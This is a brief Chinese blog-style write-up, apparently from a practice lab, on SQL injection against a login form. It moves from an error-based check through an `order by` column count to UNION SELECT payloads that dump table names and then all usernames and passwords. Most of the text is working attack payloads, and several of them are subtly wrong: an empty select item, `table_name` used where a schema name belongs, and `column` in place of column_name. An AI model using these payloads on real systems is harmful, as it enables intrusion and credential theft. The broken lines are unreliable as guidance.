随便写写。(之前不小心删了现在重发)
1,判断字符型还是数字型
输入1',由报错知道是字符型。
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' and password='' LIMIT 0,1' at line 1
2,判断列数
用order by,假设我们一共用户名和密码都不知道,可以用or条件来
' or 1=1 order by 1#然后by 2,by 3,查出是2列,联合注入。
3,开始注入
1' union select 1,database() from users#
1' union select ,group_concat(table_name) from information_schema.tables where table_name=database()#
1' union select 1,group_concat(column) from information_schema.columns where table_name=database() and table_name='users'#
最后爆出所有账号密码
1' union select group_concat(username),group_concat(password) from users#